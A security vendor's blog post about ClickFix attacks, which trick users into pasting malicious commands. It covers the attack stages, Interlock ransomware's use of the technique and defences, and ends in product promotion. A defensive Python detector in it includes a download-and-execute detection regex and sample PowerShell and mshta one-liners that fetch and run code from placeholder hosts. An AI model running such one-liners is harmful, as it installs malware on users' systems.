ClickFix: The New Malware Tactic Exploiting Social Engineering
TL;DR
ClickFix Social Engineering Attacks: A Technical Deep Dive
ClickFix is a social engineering technique that tricks users into running malicious commands themselves, leading to malware installation and other malicious activities. This technique has become prevalent due to its ability to target multiple operating systems and bypass traditional security defenses. Security researchers have observed a significant increase in ClickFix attacks, with a 500%+ spike in 2025.
How ClickFix Works
ClickFix attacks exploit users' familiarity with CAPTCHAs and other verification prompts. The attack flow typically involves the following steps:
- Infection: Users land on a web page serving the ClickFix lure, typically a compromised legitimate site or a malicious advertisement.
- Deceptive Message: A fake error message or CAPTCHA appears, instructing the user to "fix" the problem by running a command in Windows Run, PowerShell, or Terminal.
- Command Execution: The user copies and pastes the command, believing they are solving an issue.
- Malware Installation: The command silently downloads and installs malware such as Lumma Stealer, DarkGate, or NetSupport RAT.
Image courtesy of Cybersecurity News
The effectiveness of ClickFix lies in its ability to bypass traditional security defenses. Because the user runs the command themselves, antivirus and other security tools often do not flag it as malicious, and the use of trusted, built-in Windows tools such as PowerShell and the Run dialog helps the activity blend in with normal use.
Technical Details
A typical ClickFix attack involves the following technical stages:
- Initial Access: Attackers gain initial access via drive-by downloads from compromised legitimate websites or through social engineering techniques.
- Execution: Malicious payloads are executed using mshta.exe or PowerShell, often downloading and running a malware dropper.
- Persistence: Persistence is established by creating a file in the Windows Startup folder or modifying Windows Registry keys.
- Steganography: Some ClickFix campaigns use steganography to hide malicious shellcode within image files, making detection more difficult.
- Payload Delivery: The final payload often includes info-stealing malware like LummaC2 or Rhadamanthys.

Interlock Ransomware and ClickFix
The Interlock ransomware group has been observed using ClickFix as part of its attack chain. Interlock is a financially motivated group that targets businesses and critical infrastructure sectors across North America and Europe (see the joint advisory "CISA and FBI Warn of Escalating Interlock Ransomware Attacks").
Interlock actors have been observed:
- Obtaining initial access via drive-by downloads from compromised legitimate websites.
- Using ClickFix social engineering to trick users into executing malicious payloads.
- Employing a double extortion model, encrypting systems after exfiltrating data.
- Leveraging tools like Cobalt Strike and SystemBC for command and control.
Defense Strategies
To defend against ClickFix attacks, organizations should implement the following measures:
- User Education: Train employees to recognize social engineering tactics and avoid running commands from untrusted sources.
- Restrict PowerShell Execution: Implement policies to restrict PowerShell execution for standard users, ensuring only signed scripts can run.
- Application Allowlists: Create application allowlists to manage and control software on the network.
- Network Monitoring: Utilize network intrusion detection systems (NIDS) to identify and report malicious events.
- Endpoint Protection: Deploy real-time anti-malware solutions with web protection components.
- DNS Filtering: Implement domain name system (DNS) filtering to prevent initial access to malicious domains.
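The execution chain from the Technical Details section (the Run dialog, hosted by explorer.exe, spawning PowerShell or mshta.exe to download and run a payload) is exactly what the monitoring and endpoint items above need to surface. The following is an added example, not code from this page or from Gopher Security: a small Python triage over constructed Sysmon-style process-creation records, where the interpreter list, the download/exec cue list and the score threshold are assumed heuristics.

```python
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix command launches (page: Windows Run, PowerShell, mshta.exe).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# The Run dialog is hosted by explorer.exe, so this parent suggests a human pasted the
# command rather than a scheduled task or management agent launching it.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Download-and-execute cues common in pasted one-liners (assumed heuristic list).
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|invoke-expression|"
    r"\biex\b|mshta\s+https?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b)", re.IGNORECASE)

@dataclass
class ProcEvent:  # one Sysmon Event ID 1 style process-creation record
    parent_image: str
    image: str
    command_line: str

def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons); a score of 3 or more merits an analyst's look."""
    score, reasons = 0, []
    if basename(ev.image) in INTERPRETERS:
        score += 1
        reasons.append("interpreter " + basename(ev.image))
    if basename(ev.parent_image) in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("spawned from explorer.exe (Run dialog or shell)")
    hits = {m.group(0).lower() for m in DOWNLOAD_EXEC.finditer(ev.command_line)}
    if hits:
        score += 2 if len(hits) > 1 else 1  # several cues in one line weigh more
        reasons.append("download/exec cues: " + ", ".join(sorted(hits)))
    return score, reasons

def triage(events, threshold=3):
    """Events at or above the threshold, each as (event, score, reasons)."""
    scored = ((ev, *score_event(ev)) for ev in events)
    return [row for row in scored if row[1] >= threshold]

# Constructed sample telemetry, not real logs; hosts use the reserved .invalid TLD.
SAMPLE = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 'powershell -w hidden -nop -c "iex (iwr http://captcha.invalid/v)"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta http://captcha.invalid/verify.hta"),
    ProcEvent(r"C:\Program Files\Agent\agent.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell -File C:\Scripts\inventory.ps1"),  # benign management task
]
```

Execution-policy restrictions govern script files, not a command typed or pasted into the interpreter directly, so telemetry of this kind complements the PowerShell restriction above rather than replacing it.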
Gopher Security's Zero-Trust Architecture
Gopher Security specializes in AI-powered, post-quantum Zero-Trust cybersecurity architecture. Our platform converges networking and security across devices, apps, and environments—from endpoints and private networks to cloud, remote access, and containers—using peer-to-peer encrypted tunnels and quantum-resistant cryptography. This architecture is designed to mitigate threats like ClickFix by ensuring that every user, device, and application is authenticated and authorized before accessing any resource, regardless of location.
By implementing domain name system (DNS) filtering and web access firewalls, and by training users to spot phishing attempts, Gopher Security reduces the chance that a ClickFix lure ever reaches a user. Its endpoint detection and response (EDR) tooling can uncover hidden red flags of intrusion and can even prevent attackers from gaining an initial foothold in the first place.
Gopher Security solutions can significantly reduce the risk of ClickFix attacks by:
- Verifying User Identity: Ensuring that users are who they claim to be through multi-factor authentication and continuous monitoring.
- Validating Device Security: Checking that devices meet security requirements before granting access.
- Limiting Application Access: Restricting application access to only what is necessary for the user's role.
- Securing Network Connections: Encrypting all network traffic to prevent eavesdropping and data theft.
Mitigations
FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of their joint Interlock ransomware advisory to reduce the likelihood and impact of Interlock ransomware incidents.
Take Action
Protect your organization from advanced social engineering attacks like ClickFix. Contact Gopher Security today to learn more about our AI-powered, post-quantum Zero-Trust cybersecurity solutions and how we can help you build a more secure and resilient infrastructure.